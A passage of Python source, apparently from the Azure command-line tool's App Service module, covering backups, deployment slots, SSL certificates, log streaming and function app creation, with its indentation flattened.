return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot)
def delete_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot)
def enable_local_git(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
site_config = SiteConfigResource(location=location)
site_config.scm_type = 'LocalGit'
if slot is None:
client.web_apps.create_or_update_configuration(resource_group_name, name, site_config)
else:
client.web_apps.create_or_update_configuration_slot(resource_group_name, name,
site_config, slot)
return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)}
def sync_site_repo(cmd, resource_group_name, name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot)
except CloudError as ex: # Because of bad spec, sdk throws on 200. We capture it here
if ex.status_code not in [200, 204]:
raise ex
def list_app_service_plans(cmd, resource_group_name=None):
client = web_client_factory(cmd.cli_ctx)
if resource_group_name is None:
plans = list(client.app_service_plans.list())
else:
plans = list(client.app_service_plans.list_by_resource_group(resource_group_name))
for plan in plans:
# prune a few useless fields
del plan.geo_region
del plan.subscription
return plans
def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, sku='B1', number_of_workers=None,
location=None, tags=None):
if is_linux and hyper_v:
raise CLIError('usage error: --is-linux | --hyper-v')
client = web_client_factory(cmd.cli_ctx)
sku = _normalize_sku(sku)
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
# the api is odd on parameter naming, have to live with it for now
sku_def = SkuDescription(tier=get_sku_name(sku), name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name)
return client.app_service_plans.create_or_update(resource_group_name, name, plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None,
admin_site_name=None):
sku_def = instance.sku
if sku is not None:
sku = _normalize_sku(sku)
sku_def.tier = get_sku_name(sku)
sku_def.name = sku
if number_of_workers is not None:
sku_def.capacity = number_of_workers
instance.sku = sku_def
instance.sku = sku_def
if admin_site_name is not None:
instance.admin_site_name = admin_site_name
return instance
def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
raise CLIError('Backup configuration not found')
def list_backups(cmd, resource_group_name, webapp_name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_backups',
slot)
def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
db_name=None, db_type=None,
db_connection_string=None, backup_name=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
db_setting = _create_db_setting(db_name, db_type, db_connection_string)
backup_request = BackupRequest(backup_request_name=backup_name,
storage_account_url=storage_account_url, databases=db_setting)
if slot:
return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot)
return client.web_apps.backup(resource_group_name, webapp_name, backup_request)
def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
frequency=None, keep_at_least_one_backup=None,
retention_period_in_days=None, db_name=None,
db_connection_string=None, db_type=None, backup_name=None, slot=None):
configuration = None
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
if not backup_name:
from datetime import datetime
backup_name = '{0}_{1}'.format(webapp_name, datetime.utcnow().strftime('%Y%m%d%H%M'))
try:
configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except DefaultErrorResponseException:
# No configuration set yet
if not all([storage_account_url, frequency, retention_period_in_days,
keep_at_least_one_backup]):
raise CLIError('No backup configuration found. A configuration must be created. ' +
'Usage: --container-url URL --frequency TIME --retention DAYS ' +
'--retain-one TRUE/FALSE')
# If arguments were not specified, use the values in the current backup schedule
if storage_account_url is None:
storage_account_url = configuration.storage_account_url
if retention_period_in_days is None:
retention_period_in_days = configuration.backup_schedule.retention_period_in_days
if keep_at_least_one_backup is None:
keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
else:
keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
if frequency:
# Parse schedule frequency
frequency_num, frequency_unit = _parse_frequency(frequency)
else:
frequency_num = configuration.backup_schedule.frequency_interval
frequency_unit = configuration.backup_schedule.frequency_unit
if configuration and configuration.databases:
db = configuration.databases[0]
db_type = db_type or db.database_type
db_name = db_name or db.name
db_connection_string = db_connection_string or db.connection_string
db_setting = _create_db_setting(db_name, db_type, db_connection_string)
backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name,
keep_at_least_one_backup=keep_at_least_one_backup,
retention_period_in_days=retention_period_in_days)
backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule,
enabled=True, storage_account_url=storage_account_url,
databases=db_setting)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration',
slot, backup_request)
def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
db_name=None, db_type=None, db_connection_string=None,
target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
storage_blob_name = backup_name
if not storage_blob_name.lower().endswith('.zip'):
storage_blob_name += '.zip'
db_setting = _create_db_setting(db_name, db_type, db_connection_string)
restore_request = RestoreRequest(storage_account_url=storage_account_url,
blob_name=storage_blob_name, overwrite=overwrite,
site_name=target_name, databases=db_setting,
ignore_conflicting_host_names=ignore_hostname_conflict)
if slot:
return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot)
return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request)
def list_snapshots(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_snapshots',
slot)
def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False, # pylint: disable=redefined-outer-name
source_resource_group=None, source_name=None, source_slot=None):
from azure.cli.core.commands.client_factory import get_subscription_id
client = web_client_factory(cmd.cli_ctx)
recover_config = not restore_content_only
if all([source_resource_group, source_name]):
# Restore from source app to target app
sub_id = get_subscription_id(cmd.cli_ctx)
source_id = "/subscriptions/" + sub_id + "/resourceGroups/" + source_resource_group + \
"/providers/Microsoft.Web/sites/" + source_name
if source_slot:
source_id = source_id + "/slots/" + source_slot
source = SnapshotRecoverySource(id=source_id)
request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time, recovery_source=source,
recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
elif any([source_resource_group, source_name]):
raise CLIError('usage error: --source-resource-group and --source-name must both be specified if one is used')
else:
# Overwrite app with its own snapshot
request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time, recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
# pylint: disable=inconsistent-return-statements
def _create_db_setting(db_name, db_type, db_connection_string):
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)]
elif any([db_name, db_type, db_connection_string]):
raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
def _parse_frequency(frequency):
unit_part = frequency.lower()[-1]
if unit_part == 'd':
frequency_unit = FrequencyUnit.day
elif unit_part == 'h':
frequency_unit = FrequencyUnit.hour
else:
raise CLIError('Frequency must end with d or h for "day" or "hour"')
try:
frequency_num = int(frequency[:-1])
except ValueError:
raise CLIError('Frequency must start with a number')
if frequency_num < 0:
raise CLIError('Frequency must be positive')
return frequency_num, frequency_unit
def _normalize_sku(sku):
sku = sku.upper()
if sku == 'FREE':
return 'F1'
elif sku == 'SHARED':
return 'D1'
return sku
def _get_location_from_resource_group(cli_ctx, resource_group_name):
from azure.mgmt.resource import ResourceManagementClient
client = get_mgmt_service_client(cli_ctx, ResourceManagementClient)
group = client.resource_groups.get(resource_group_name)
return group.location
def _get_location_from_webapp(client, resource_group_name, webapp):
webapp = client.web_apps.get(resource_group_name, webapp)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp))
return webapp.location
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
user = client.get_publishing_user()
result = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot)
parsed = urlparse(result.repo_url)
return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name,
parsed.netloc, name)
def _get_scm_url(cmd, resource_group_name, name, slot=None):
from azure.mgmt.web.models import HostType
webapp = show_webapp(cmd, resource_group_name, name, slot=slot)
for host in webapp.host_name_ssl_states or []:
if host.host_type == HostType.repository:
return "https://{}".format(host.name)
# this should not happen, but throw anyway
raise ValueError('Failed to retrieve Scm Uri')
def set_deployment_user(cmd, user_name, password=None):
'''
Update deployment credentials.(Note, all webapps in your subscription will be impacted)
'''
client = web_client_factory(cmd.cli_ctx)
user = User(publishing_user_name=user_name)
if password is None:
try:
password = prompt_pass(msg='Password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
user.publishing_password = password
return client.update_publishing_user(user)
def list_publish_profiles(cmd, resource_group_name, name, slot=None):
import xmltodict
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_profile_xml_with_secrets', slot)
full_xml = ''
for f in content:
full_xml += f.decode()
profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
converted = []
for profile in profiles:
new = {}
for key in profile:
# strip the leading '@' xmltodict put in for attributes
new[key.lstrip('@')] = profile[key]
converted.append(new)
return converted
def enable_cd(cmd, resource_group_name, name, enable, slot=None):
settings = []
settings.append("DOCKER_ENABLE_CI=" + enable)
update_app_settings(cmd, resource_group_name, name, settings, slot)
return show_container_cd_url(cmd, resource_group_name, name, slot)
def show_container_cd_url(cmd, resource_group_name, name, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
docker_enabled = False
for setting in settings:
if setting['name'] == 'DOCKER_ENABLE_CI' and setting['value'] == 'true':
docker_enabled = True
break
cd_settings = {}
cd_settings['DOCKER_ENABLE_CI'] = docker_enabled
if docker_enabled:
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
for profile in profiles:
if profile['publishMethod'] == 'MSDeploy':
scmUrl = profile['publishUrl'].replace(":443", "")
cd_url = 'https://' + profile['userName'] + ':' + profile['userPWD'] + '@' + scmUrl + '/docker/hook'
cd_settings['CI_CD_URL'] = cd_url
break
else:
cd_settings['CI_CD_URL'] = ''
return cd_settings
def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
url = _get_url(cmd, resource_group_name, name, slot)
open_page_in_browser(url)
if logs:
get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)
def _get_url(cmd, resource_group_name, name, slot=None):
site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
url = site.enabled_host_names[0] # picks the custom domain URL incase a domain is assigned
ssl_host = next((h for h in site.host_name_ssl_states
if h.ssl_state != SslState.disabled), None)
return ('https' if ssl_host else 'http') + '://' + url
# TODO: expose new blob suport
def config_diagnostics(cmd, resource_group_name, name, level=None,
application_logging=None, web_server_logging=None,
docker_container_logging=None, detailed_error_messages=None,
failed_request_tracing=None, slot=None):
from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
SiteLogsConfig, HttpLogsConfig, FileSystemHttpLogsConfig,
EnabledConfig)
client = web_client_factory(cmd.cli_ctx)
# TODO: ensure we call get_site only once
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
location = site.location
application_logs = None
if application_logging is not None:
if not application_logging:
level = 'Off'
elif level is None:
level = 'Error'
fs_log = FileSystemApplicationLogsConfig(level=level)
application_logs = ApplicationLogsConfig(file_system=fs_log)
http_logs = None
server_logging_option = web_server_logging or docker_container_logging
if server_logging_option:
# TODO: az blob storage log config currently not in use, will be impelemented later.
# Tracked as Issue: #4764 on Github
filesystem_log_config = None
turned_on = server_logging_option != 'off'
if server_logging_option in ['filesystem', 'off']:
# 100 mb max log size, retention lasts 3 days. Yes we hard code it, portal does too
filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3,
enabled=turned_on)
http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)
detailed_error_messages_logs = (None if detailed_error_messages is None
else EnabledConfig(enabled=detailed_error_messages))
failed_request_tracing_logs = (None if failed_request_tracing is None
else EnabledConfig(enabled=failed_request_tracing))
site_log_config = SiteLogsConfig(location=location,
application_logs=application_logs,
http_logs=http_logs,
failed_requests_tracing=failed_request_tracing_logs,
detailed_error_messages=detailed_error_messages_logs)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config',
slot, site_log_config)
def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_diagnostic_logs_configuration', slot)
def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
client = web_client_factory(cmd.cli_ctx)
site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
site_config.auto_swap_slot_name = '' if disable else (auto_swap_slot or 'production')
return client.web_apps.update_configuration_slot(resource_group_name, webapp, site_config, slot)
def list_slots(cmd, resource_group_name, webapp):
client = web_client_factory(cmd.cli_ctx)
slots = list(client.web_apps.list_slots(resource_group_name, webapp))
for slot in slots:
slot.name = slot.name.split('/')[-1]
setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name'])
del slot.server_farm_id
return slots
def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, action='swap'):
client = web_client_factory(cmd.cli_ctx)
if action == 'swap':
poller = client.web_apps.swap_slot_slot(resource_group_name, webapp,
slot, (target_slot or 'production'), True)
return poller
elif action == 'preview':
if target_slot is None:
result = client.web_apps.apply_slot_config_to_production(resource_group_name,
webapp, slot, True)
else:
result = client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp,
slot, target_slot, True)
return result
else: # reset
# we will reset both source slot and target slot
if target_slot is None:
client.web_apps.reset_production_slot_config(resource_group_name, webapp)
else:
client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
return None
def delete_slot(cmd, resource_group_name, webapp, slot):
client = web_client_factory(cmd.cli_ctx)
# TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
client.web_apps.delete_slot(resource_group_name, webapp, slot)
def set_traffic_routing(cmd, resource_group_name, name, distribution):
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
configs = get_site_configs(cmd, resource_group_name, name)
host_name_suffix = '.' + site.default_host_name.split('.', 1)[1]
configs.experiments.ramp_up_rules = []
for r in distribution:
slot, percentage = r.split('=')
configs.experiments.ramp_up_rules.append(RampUpRule(action_host_name=slot + host_name_suffix,
reroute_percentage=float(percentage),
name=slot))
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs)
return configs.experiments.ramp_up_rules
def show_traffic_routing(cmd, resource_group_name, name):
configs = get_site_configs(cmd, resource_group_name, name)
return configs.experiments.ramp_up_rules
def clear_traffic_routing(cmd, resource_group_name, name):
set_traffic_routing(cmd, resource_group_name, name, [])
def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
from azure.mgmt.web.models import CorsSettings
configs = get_site_configs(cmd, resource_group_name, name, slot)
if not configs.cors:
configs.cors = CorsSettings()
configs.cors.allowed_origins = (configs.cors.allowed_origins or []) + allowed_origins
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return result.cors
def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if configs.cors:
if allowed_origins:
configs.cors.allowed_origins = [x for x in (configs.cors.allowed_origins or []) if x not in allowed_origins]
else:
configs.cors.allowed_origins = []
configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return configs.cors
def show_cors(cmd, resource_group_name, name, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
return configs.cors
def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
streaming_url = scm_url + '/logstream'
if provider:
streaming_url += ('/' + provider.lstrip('/'))
user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
t = threading.Thread(target=_get_log, args=(streaming_url, user, password))
t.daemon = True
t.start()
while True:
time.sleep(100) # so that ctrl+c can stop the command
def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
url = scm_url.rstrip('/') + '/dump'
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
_get_log(url, user_name, password, log_file)
logger.warning('Downloaded logs to %s', log_file)
def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
creds = _generic_site_operation(cli_ctx, resource_group_name, name, 'list_publishing_credentials', slot)
creds = creds.result()
return (creds.publishing_user_name, creds.publishing_password)
def _get_log(url, user_name, password, log_file=None):
import certifi
import urllib3
try:
import urllib3.contrib.pyopenssl
urllib3.contrib.pyopenssl.inject_into_urllib3()
except ImportError:
pass
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
r = http.request(
'GET',
url,
headers=headers,
preload_content=False
)
if r.status != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
url, r.status, r.reason))
if log_file: # download logs
with open(log_file, 'wb') as f:
while True:
data = r.read(1024)
if not data:
break
f.write(data)
else: # streaming
std_encoding = sys.stdout.encoding
for chunk in r.stream():
if chunk:
# Extra encode() and decode for stdout which does not surpport 'utf-8'
print(chunk.decode(encoding='utf-8', errors='replace')
.encode(std_encoding, errors='replace')
.decode(std_encoding, errors='replace'), end='') # each line of log has CRLF.
r.release_conn()
def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file):
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get')
cert_file = open(certificate_file, 'rb')
cert_contents = cert_file.read()
hosting_environment_profile_param = (webapp.hosting_environment_profile.name
if webapp.hosting_environment_profile else '')
thumb_print = _get_cert(certificate_password, certificate_file)
cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
webapp.location, resource_group_name)
cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
location=webapp.location, server_farm_id=webapp.server_farm_id)
return client.certificates.create_or_update(resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
''' Decrypts the .pfx file '''
p12 = OpenSSL.crypto.load_pkcs12(open(certificate_file, 'rb').read(), certificate_password)
cert = p12.get_certificate()
digest_algorithm = 'sha1'
thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
return thumbprint
def list_ssl_certs(cmd, resource_group_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.list_by_resource_group(resource_group_name)
def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
client = web_client_factory(cmd.cli_ctx)
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
return client.certificates.delete(resource_group_name, webapp_cert.name)
raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
def _update_host_name_ssl_state(cli_ctx, resource_group_name, webapp_name, location,
host_name, ssl_state, thumbprint, slot=None):
updated_webapp = Site(host_name_ssl_states=[HostNameSslState(name=host_name,
ssl_state=ssl_state,
thumbprint=thumbprint,
to_update=True)],
location=location)
name = '{}({})'.format(webapp_name, slot) if slot else webapp_name
return _generic_site_operation(cli_ctx, resource_group_name, name, 'create_or_update',
slot, updated_webapp)
def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
if len(webapp_cert.host_names) == 1 and not webapp_cert.host_names[0].startswith('*'):
return _update_host_name_ssl_state(cmd.cli_ctx, resource_group_name, name, webapp.location,
webapp_cert.host_names[0], ssl_type,
certificate_thumbprint, slot)
query_result = list_hostnames(cmd, resource_group_name, name, slot)
hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
to_update = _match_host_names_from_cert(webapp_cert.host_names, hostnames_in_webapp)
for h in to_update:
_update_host_name_ssl_state(cmd.cli_ctx, resource_group_name, name, webapp.location,
h, ssl_type, certificate_thumbprint, slot)
return show_webapp(cmd, resource_group_name, name, slot)
raise CLIError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint,
SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled, slot)
def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
return _update_ssl_binding(cmd, resource_group_name, name,
certificate_thumbprint, SslState.disabled, slot)
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
# the goal is to match '*.foo.com' with host name like 'admin.foo.com', 'logs.foo.com', etc
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
# help class handles runtime stack in format like 'node|6.1', 'php|5.5'
class _StackRuntimeHelper(object):
def __init__(self, client, linux=False):
self._client = client
self._linux = linux
self._stacks = []
def resolve(self, display_name):
self._load_stacks()
return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()),
None)
@property
def stacks(self):
self._load_stacks()
return self._stacks
@staticmethod
def update_site_config(stack, site_config):
for k, v in stack['configs'].items():
setattr(site_config, k, v)
return site_config
@staticmethod
def update_site_appsettings(stack, site_config):
if site_config.app_settings is None:
site_config.app_settings = []
site_config.app_settings += [NameValuePair(name=k, value=v) for k, v in stack['configs'].items()]
return site_config
def _load_stacks(self):
if self._stacks:
return
os_type = ('Linux' if self._linux else 'Windows')
raw_stacks = self._client.provider.get_available_stacks(os_type_selected=os_type, raw=True)
bytes_value = raw_stacks._get_next().content # pylint: disable=protected-access
json_value = bytes_value.decode('utf8')
json_stacks = json.loads(json_value)
stacks = json_stacks['value']
result = []
if self._linux:
for properties in [(s['properties']) for s in stacks]:
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
})
else: # Windows stacks
config_mappings = {
'node': 'WEBSITE_NODE_DEFAULT_VERSION',
'python': 'python_version',
'php': 'php_version',
'aspnet': 'net_framework_version'
}
# get all stack version except 'java'
for stack in stacks:
if stack['name'] not in config_mappings:
continue
name, properties = stack['name'], stack['properties']
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': name + '|' + major['displayVersion'],
'configs': {
config_mappings[name]: (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
}
})
# deal with java, which pairs with java container version
java_stack = next((s for s in stacks if s['name'] == 'java'))
java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers'))
for java_version in java_stack['properties']['majorVersions']:
for fx in java_container_stack['properties']['frameworks']:
for fx_version in fx['majorVersions']:
result.append({
'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'],
fx['display'],
fx_version['displayVersion']),
'configs': {
'java_version': java_version['runtimeVersion'],
'java_container': fx['name'],
'java_container_version': fx_version['runtimeVersion']
}
})
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
def get_app_insights_key(cli_ctx, resource_group, name):
appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient)
appinsights = appinsights_client.components.get(resource_group, name)
if appinsights is None or appinsights.instrumentation_key is None:
raise CLIError("App Insights {} under resource group {} was not found.".format(name, resource_group))
return appinsights.instrumentation_key
def create_functionapp_app_service_plan(cmd, resource_group_name, name, sku,
number_of_workers=None, location=None, tags=None):
# This command merely shadows 'az appservice plan create' except with a few parameters
return create_app_service_plan(cmd, resource_group_name, name, is_linux=None, hyper_v=None,
sku=sku, number_of_workers=number_of_workers, location=location, tags=tags)
def is_plan_Elastic_Premium(plan_info):
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier == 'ElasticPremium'
return False
def create_function(cmd, resource_group_name, name, storage_account, plan=None,
os_type=None, runtime=None, consumption_plan_location=None,
app_insights=None, app_insights_key=None, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None,
deployment_container_image_name=None, tags=None):
# pylint: disable=too-many-statements, too-many-branches
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
if bool(plan) == bool(consumption_plan_location):
raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
site_config = SiteConfig(app_settings=[])
functionapp_def = Site(location=None, site_config=site_config, tags=tags)
client = web_client_factory(cmd.cli_ctx)
plan_info = None
if consumption_plan_location:
locations = list_consumption_locations(cmd)
location = next((l for l in locations if l['name'].lower() == consumption_plan_location.lower()), None)
if location is None:
raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations")
functionapp_def.location = consumption_plan_location
functionapp_def.kind = 'functionapp'
# if os_type is None, the os type is windows
is_linux = os_type and os_type.lower() == 'linux'
# for linux consumption plan app the os_type should be Linux & should have a runtime specified
# currently in other cases the runtime is ignored
if is_linux and not runtime:
raise CLIError("usage error: --runtime RUNTIME required for linux functions apps with consumption plan.")
else: # apps with SKU based plan
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
location = plan_info.location
is_linux = plan_info.reserved
functionapp_def.server_farm_id = plan
functionapp_def.location = location
if runtime:
if is_linux and runtime not in LINUX_RUNTIMES:
raise CLIError("usage error: Currently supported runtimes (--runtime) in linux function apps are: {}."
.format(', '.join(LINUX_RUNTIMES)))
elif not is_linux and runtime not in WINDOWS_RUNTIMES:
raise CLIError("usage error: Currently supported runtimes (--runtime) in windows function apps are: {}."
.format(', '.join(WINDOWS_RUNTIMES)))
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_WORKER_RUNTIME', value=runtime))
con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
if is_linux:
functionapp_def.kind = 'functionapp,linux'
functionapp_def.reserved = True
if consumption_plan_location:
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION', value='~2'))
else:
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION', value='beta'))
site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
value=str(hexlify(urandom(32)).decode()).upper()))
if deployment_container_image_name:
functionapp_def.kind = 'functionapp,linux,container'
site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
value=deployment_container_image_name))
site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly'))
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='false'))
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
else:
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='true'))
site_config.linux_fx_version = _format_fx_version('appsvc/azure-functions-runtime')
else:
functionapp_def.kind = 'functionapp'
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION', value='~2'))
# adding appsetting to site to make it a function
site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_NODE_DEFAULT_VERSION', value='8.11.1'))
if consumption_plan_location is None and not is_plan_Elastic_Premium(plan_info):
site_config.always_on = True
else:
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=name.lower()))
if app_insights_key is not None:
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=app_insights_key))
elif app_insights is not None:
